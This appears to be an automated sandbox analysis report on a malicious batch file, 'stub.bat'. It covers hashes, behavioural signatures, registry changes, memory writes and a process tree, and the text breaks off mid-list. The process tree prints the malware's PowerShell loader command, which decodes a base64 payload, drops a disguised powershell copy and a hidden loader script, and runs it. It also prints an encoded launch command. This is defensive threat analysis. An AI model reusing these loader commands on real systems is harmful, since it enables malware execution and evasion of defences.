cd6c05138680001d640a47ed988487797a4b77e95bff6c4f57ae57d294aa53e1

Resubmissions

08-07-2024 15:19

240708-sqj4jaxflf 10

08-07-2024 13:40

240708-qyw2ys1gll 8

Analysis

max time kernel
600s
max time network
433s
platform
windows10-2004_x64
resource
win10v2004-20240708-en
resource tags

arch:x64arch:x86image:win10v2004-20240708-enlocale:en-usos:windows10-2004-x64system
submitted
08-07-2024 15:19

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

stub.bat
Size

3.4MB
MD5

c27b8c9f05c86817d8d287f0d0bd8698
SHA1

239748a1871a85c7df6733bc24d9497a331aca87
SHA256

cd6c05138680001d640a47ed988487797a4b77e95bff6c4f57ae57d294aa53e1
SHA512

fbd18278c1d8c18360f16cf11db634162cb7e14484853496670ca074e06cbd26f5933b9cd22046063da3f86c294c786c20a00545baa8cbdc76a6af61c55c7bca
SSDEEP

49152:/mThC67EFbMUKiKknefnfIlTYhjwHs0j+VqdyvZWs6sT/Pj5wSe/XDX/DlbfZ5+m:n

Score

10^/10

execution

Malware Config

Signatures

Suspicious use of NtCreateProcessExOtherParentProcess 1 IoCs

description	pid	Process	procid_target
PID 3044 created 3176	3044	WerFault.exe	80

Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs

description	pid	Process	procid_target
PID 2988 created 3176	2988	svchost.exe	80

Blocklisted process makes network request 4 IoCs

flow	pid	Process
8	4296	powershell.exe
9	4296	powershell.exe
10	4296	powershell.exe
11	4296	powershell.exe

Executes dropped EXE 1 IoCs

pid	Process
4880	$ktm-powershell.exe

Drops file in System32 directory 4 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4KernelMode.evtx	svchost.exe
File opened for modification	C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4UserMode.evtx	svchost.exe
File opened for modification	C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Kernel-EventTracing%4Admin.evtx	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\WebCache\V01.chk	DllHost.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
4296	powershell.exe

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WerFault.exe

Enumerates system info in registry 2 TTPs 2 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe

Modifies data under HKEY_USERS 62 IoCs

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Classes\Local Settings\MuiCache\26\52C64B7E\@%SystemRoot%\System32\wuaueng.dll,-400 = "Windows Update"	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	svchost.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe_queried = "1720452105"	OfficeClickToRun.exe
Key deleted	\REGISTRY\USER\.DEFAULT\SOFTWARE\MICROSOFT\OFFICE\16.0\COMMON\CLIENTTELEMETRY\RULESMETADATA\OFFICECLICKTORUN.EXE\ULSMONITOR	OfficeClickToRun.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	svchost.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Classes\Local Settings\MuiCache\26\52C64B7E\@%SystemRoot%\system32\NgcRecovery.dll,-100 = "Windows Hello Recovery Key Encryption"	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CRLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe	OfficeClickToRun.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Root\CRLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\trust\CTLs	svchost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSCategoriesSeverities = "1329 10,1329 50,1329 15,1329 100,1329 6"	OfficeClickToRun.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Classes\Local Settings\MuiCache\26\52C64B7E\@%SystemRoot%\System32\fveui.dll,-843 = "BitLocker Drive Encryption"	svchost.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Classes\Local Settings\MuiCache\26\52C64B7E\@%SystemRoot%\System32\fveui.dll,-844 = "BitLocker Data Recovery Agent"	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\trust\CRLs	svchost.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Classes\Local Settings\MuiCache\26\52C64B7E\@%SystemRoot%\System32\ci.dll,-101 = "Enclave"	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates	svchost.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Classes\Local Settings\MuiCache\26\52C64B7E\@%SystemRoot%\system32\WindowsPowerShell\v1.0\powershell.exe,-124 = "Document Encryption"	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry	OfficeClickToRun.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\Certificates	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CRLs	svchost.exe
Key deleted	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor	OfficeClickToRun.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CTLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\Certificates	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CTLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\Certificates	svchost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,17110992,7202269,41484365,17110988,7153487,39965824,17962391,508368333,17962392,3462423,3702920,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617"	OfficeClickToRun.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad	svchost.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Classes\Local Settings\MuiCache\26\52C64B7E\@%SystemRoot%\System32\ci.dll,-100 = "Isolated User Mode (IUM)"	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\CA\CRLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	svchost.exe
Key deleted	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata	OfficeClickToRun.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Classes\Local Settings\MuiCache\26\52C64B7E\@%SystemRoot%\system32\dnsapi.dll,-103 = "Domain Name System (DNS) Server Trust"	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CTLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CTLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\trust\Certificates	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0	OfficeClickToRun.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CRLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\CA\CTLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\Certificates	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CRLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Root\CTLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common	OfficeClickToRun.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
4296	powershell.exe
4296	powershell.exe
4296	powershell.exe
4296	powershell.exe
4296	powershell.exe
4296	powershell.exe
4296	powershell.exe
4296	powershell.exe
4296	powershell.exe
4296	powershell.exe
4296	powershell.exe
4296	powershell.exe
4296	powershell.exe
4296	powershell.exe
4296	powershell.exe
4296	powershell.exe
4296	powershell.exe
4296	powershell.exe
4296	powershell.exe
4296	powershell.exe
4296	powershell.exe
4296	powershell.exe
4296	powershell.exe
4296	powershell.exe
4296	powershell.exe
4296	powershell.exe
4296	powershell.exe
4296	powershell.exe
4296	powershell.exe
4296	powershell.exe
4296	powershell.exe
4296	powershell.exe
4296	powershell.exe
4296	powershell.exe
4296	powershell.exe
4296	powershell.exe
4296	powershell.exe
4296	powershell.exe
4296	powershell.exe
4296	powershell.exe
4296	powershell.exe
4296	powershell.exe
4296	powershell.exe
4296	powershell.exe
4296	powershell.exe
4296	powershell.exe
4296	powershell.exe
4296	powershell.exe
2948	WerFault.exe
2948	WerFault.exe
4296	powershell.exe
4296	powershell.exe
4296	powershell.exe
4296	powershell.exe
2988	svchost.exe
2988	svchost.exe
4296	powershell.exe
4296	powershell.exe
4296	powershell.exe
4296	powershell.exe
4296	powershell.exe
4296	powershell.exe
4296	powershell.exe
4296	powershell.exe

Suspicious behavior: LoadsDriver 64 IoCs

pid	Process
376	Process not Found
2140	Process not Found
2964	Process not Found
2168	Process not Found
4244	Process not Found
2288	Process not Found
3212	Process not Found
400	Process not Found
1576	Process not Found
5096	Process not Found
3932	Process not Found
1352	Process not Found
564	Process not Found
4584	Process not Found
1776	Process not Found
3208	Process not Found
3116	Process not Found
1396	Process not Found
5072	Process not Found
1648	Process not Found
640	Process not Found
4636	Process not Found
4080	Process not Found
2192	Process not Found
4556	Process not Found
1704	Process not Found
1172	Process not Found
4724	Process not Found
3912	Process not Found
4500	Process not Found
3868	Process not Found
2588	Process not Found
4024	Process not Found
1708	Process not Found
3408	Process not Found
1272	Process not Found
2600	Process not Found
4956	Process not Found
4308	Process not Found
3120	Process not Found
4416	Process not Found
3828	Process not Found
3124	Process not Found
972	Process not Found
3972	Process not Found
3628	Process not Found
3484	Process not Found
3880	Process not Found
4140	Process not Found
4156	Process not Found
4172	Process not Found
4260	Process not Found
4316	Process not Found
4376	Process not Found
4916	Process not Found
392	Process not Found
3908	Process not Found
4076	Process not Found
2384	Process not Found
3928	Process not Found
3952	Process not Found
4356	Process not Found
1736	Process not Found
4408	Process not Found

Suspicious use of AdjustPrivilegeToken 20 IoCs

description	pid	Process
Token: SeDebugPrivilege	4296	powershell.exe
Token: SeDebugPrivilege	4296	powershell.exe
Token: SeDebugPrivilege	4296	powershell.exe
Token: SeAuditPrivilege	2720	svchost.exe
Token: SeShutdownPrivilege	3460	Explorer.EXE
Token: SeCreatePagefilePrivilege	3460	Explorer.EXE
Token: SeShutdownPrivilege	3460	Explorer.EXE
Token: SeCreatePagefilePrivilege	3460	Explorer.EXE
Token: SeShutdownPrivilege	3460	Explorer.EXE
Token: SeCreatePagefilePrivilege	3460	Explorer.EXE
Token: SeShutdownPrivilege	3460	Explorer.EXE
Token: SeCreatePagefilePrivilege	3460	Explorer.EXE
Token: SeShutdownPrivilege	3460	Explorer.EXE
Token: SeCreatePagefilePrivilege	3460	Explorer.EXE
Token: SeShutdownPrivilege	3460	Explorer.EXE
Token: SeCreatePagefilePrivilege	3460	Explorer.EXE
Token: SeShutdownPrivilege	3460	Explorer.EXE
Token: SeCreatePagefilePrivilege	3460	Explorer.EXE
Token: SeShutdownPrivilege	3460	Explorer.EXE
Token: SeCreatePagefilePrivilege	3460	Explorer.EXE

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4928 wrote to memory of 4296	4928	cmd.exe	82
PID 4928 wrote to memory of 4296	4928	cmd.exe	82
PID 4296 wrote to memory of 628	4296	powershell.exe	5
PID 4296 wrote to memory of 684	4296	powershell.exe	7
PID 4296 wrote to memory of 976	4296	powershell.exe	12
PID 4296 wrote to memory of 372	4296	powershell.exe	13
PID 4296 wrote to memory of 748	4296	powershell.exe	14
PID 4296 wrote to memory of 668	4296	powershell.exe	15
PID 684 wrote to memory of 2676	684	lsass.exe	47
PID 4296 wrote to memory of 1056	4296	powershell.exe	17
PID 4296 wrote to memory of 1064	4296	powershell.exe	18
PID 4296 wrote to memory of 1140	4296	powershell.exe	19
PID 4296 wrote to memory of 1184	4296	powershell.exe	20
PID 4296 wrote to memory of 1200	4296	powershell.exe	21
PID 4296 wrote to memory of 1288	4296	powershell.exe	22
PID 4296 wrote to memory of 1372	4296	powershell.exe	23
PID 4296 wrote to memory of 1444	4296	powershell.exe	24
PID 4296 wrote to memory of 1452	4296	powershell.exe	25
PID 4296 wrote to memory of 1532	4296	powershell.exe	26
PID 4296 wrote to memory of 1600	4296	powershell.exe	27
PID 4296 wrote to memory of 1640	4296	powershell.exe	28
PID 4296 wrote to memory of 1656	4296	powershell.exe	29
PID 4296 wrote to memory of 1744	4296	powershell.exe	30
PID 4296 wrote to memory of 4880	4296	powershell.exe	88
PID 4296 wrote to memory of 4880	4296	powershell.exe	88
PID 4296 wrote to memory of 1760	4296	powershell.exe	31
PID 684 wrote to memory of 2676	684	lsass.exe	47
PID 684 wrote to memory of 2676	684	lsass.exe	47
PID 4296 wrote to memory of 1844	4296	powershell.exe	32
PID 4296 wrote to memory of 1864	4296	powershell.exe	33
PID 4296 wrote to memory of 1880	4296	powershell.exe	34
PID 4296 wrote to memory of 1960	4296	powershell.exe	35
PID 4296 wrote to memory of 2032	4296	powershell.exe	36
PID 4296 wrote to memory of 1636	4296	powershell.exe	38
PID 4296 wrote to memory of 1852	4296	powershell.exe	39
PID 4296 wrote to memory of 2160	4296	powershell.exe	40
PID 4296 wrote to memory of 2356	4296	powershell.exe	41
PID 4296 wrote to memory of 2364	4296	powershell.exe	42
PID 4296 wrote to memory of 2468	4296	powershell.exe	43
PID 4296 wrote to memory of 2504	4296	powershell.exe	44
PID 4296 wrote to memory of 2516	4296	powershell.exe	45
PID 4296 wrote to memory of 2576	4296	powershell.exe	46
PID 4296 wrote to memory of 2676	4296	powershell.exe	47
PID 4296 wrote to memory of 2720	4296	powershell.exe	48
PID 1288 wrote to memory of 4556	1288	svchost.exe	90
PID 1288 wrote to memory of 4556	1288	svchost.exe	90
PID 4296 wrote to memory of 4556	4296	powershell.exe	90
PID 684 wrote to memory of 2676	684	lsass.exe	47
PID 4296 wrote to memory of 2728	4296	powershell.exe	49
PID 4296 wrote to memory of 2748	4296	powershell.exe	50
PID 1288 wrote to memory of 972	1288	svchost.exe	91
PID 1288 wrote to memory of 972	1288	svchost.exe	91
PID 4296 wrote to memory of 972	4296	powershell.exe	91
PID 684 wrote to memory of 2676	684	lsass.exe	47
PID 4296 wrote to memory of 2756	4296	powershell.exe	51
PID 1288 wrote to memory of 2276	1288	svchost.exe	92
PID 1288 wrote to memory of 2276	1288	svchost.exe	92
PID 4296 wrote to memory of 2276	4296	powershell.exe	92
PID 4296 wrote to memory of 2876	4296	powershell.exe	52
PID 684 wrote to memory of 2676	684	lsass.exe	47
PID 4296 wrote to memory of 2928	4296	powershell.exe	53
PID 4296 wrote to memory of 3324	4296	powershell.exe	55
PID 4296 wrote to memory of 3460	4296	powershell.exe	56
PID 684 wrote to memory of 2676	684	lsass.exe	47

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\system32\winlogon.exe
winlogon.exe
1⤵
PID:628
- C:\Windows\system32\dwm.exe
  "dwm.exe"
  2⤵
  PID:372

C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
1⤵
- Suspicious use of WriteProcessMemory
PID:684

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
1⤵
PID:976

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
1⤵
PID:748

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
1⤵
PID:668

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
1⤵
PID:1056

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
1⤵
PID:1064

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
1⤵
PID:1140
- C:\Windows\system32\taskhostw.exe
  taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
  2⤵
  PID:2748

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
1⤵
PID:1184

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
1⤵
PID:1200

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
1⤵
- Suspicious use of WriteProcessMemory
PID:1288
- C:\Windows\system32\sihost.exe
  sihost.exe
  2⤵
  PID:2504
- C:\Windows\system32\sihost.exe
  sihost.exe
  2⤵
  PID:4556
- C:\Windows\system32\sihost.exe
  sihost.exe
  2⤵
  PID:972
- C:\Windows\system32\sihost.exe
  sihost.exe
  2⤵
  PID:2276
- C:\Windows\system32\sihost.exe
  sihost.exe
  2⤵
  PID:1572
- C:\Windows\system32\sihost.exe
  sihost.exe
  2⤵
  PID:1220
- C:\Windows\system32\sihost.exe
  sihost.exe
  2⤵
  PID:2544

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
1⤵
- Drops file in System32 directory
PID:1372

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
1⤵
PID:1444

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
1⤵
PID:1452

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
1⤵
PID:1532

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
1⤵
PID:1600

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
1⤵
PID:1640

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
1⤵
PID:1656

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
1⤵
PID:1744

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1760

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
1⤵
PID:1844

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
1⤵
PID:1864

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1880

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
1⤵
PID:1960

C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
1⤵
PID:2032

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
1⤵
PID:1636

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
1⤵
PID:1852

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
1⤵
PID:2160

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
1⤵
PID:2356

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
1⤵
PID:2364

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
1⤵
PID:2468

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
1⤵
PID:2516

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
1⤵
- Modifies data under HKEY_USERS
PID:2576

C:\Windows\sysmon.exe
C:\Windows\sysmon.exe
1⤵
PID:2676

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2720

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
1⤵
PID:2728

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
1⤵
PID:2756

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
1⤵
PID:2876

C:\Windows\system32\wbem\unsecapp.exe
C:\Windows\system32\wbem\unsecapp.exe -Embedding
1⤵
PID:2928

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
1⤵
PID:3324

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:3460
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\stub.bat"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4928
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:3176
  - - C:\Windows\system32\WerFault.exe
      C:\Windows\system32\WerFault.exe -u -p 3176 -s 436
      4⤵
      Checks processor information in registry
      Enumerates system info in registry
      Suspicious behavior: EnumeratesProcesses
      PID:2948
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -command "Copy-Item -Path C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -Destination $env:LOCALAPPDATA\`$ktm-powershell.exe; $data = Get-Content -Path 'C:\Users\Admin\AppData\Local\Temp\stub.bat'; $lines = $data -split '\n';$last_line = $lines[-1]; $last_line = [Convert]::FromBase64String($last_line.Replace('\n', '')); $last_line = [System.Text.Encoding]::Unicode.GetString($last_line); [System.IO.File]::WriteAllText($env:LOCALAPPDATA + '\\$ktm-loader.ps1', $last_line); $last_line | iex"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:4296
  - - C:\Users\Admin\AppData\Local\$ktm-powershell.exe
      "C:\Users\Admin\AppData\Local\$ktm-powershell.exe" -ep bypass -ec JABtAHQAeAAgAD0AIAAiAEcAbABvAGIAYQBsAFwASABqAFgAQgBGADUAWgBPADcAaQBVAGkAdgBoADkAWgBRAE0AYQBtACIAOwAgACQAbQB0AHgATwBiAGoAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAaAByAGUAYQBkAGkAbgBnAC4ATQB1AHQAZQB4AF0AOgA6AE8AcABlAG4ARQB4AGkAcwB0AGkAbgBnACgAJABtAHQAeAApADsAIAB3AGgAaQBsAGUAIAAoACQAdAByAHUAZQApACAAewAgACQAbQB0AHgATwBiAGoALgBXAGEAaQB0AE8AbgBlACgAKQA7ACAAJABtAHQAeABPAGIAagAuAFIAZQBsAGUAYQBzAGUATQB1AHQAZQB4ACgAKQA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAIgBwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAIgAgAC0AQQByAGcAdQBtAGUAbgB0AEwAaQBzAHQAIAAiAC0AZQBwACAAYgB5AHAAYQBzAHMAIAAtAGYAIAAkAHsAZQBuAHYAOgBMAE8AQwBBAEwAQQBQAFAARABBAFQAQQB9AFwAYAAkAGsAdABtAC0AbABvAGEAZABlAHIALgBwAHMAMQAiACAALQBXAGkAbgBkAG8AdwBTAHQAeQBsAGUAIABIAGkAZABkAGUAbgA7ACAARQB4AGkAdAAgADAAOwAgAH0A
      4⤵
      Executes dropped EXE
      PID:4880

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
1⤵
PID:3604

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:3776

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:3984

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:3888

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:2124

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
1⤵
PID:3428

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
1⤵
PID:4988

C:\Windows\system32\svchost.exe
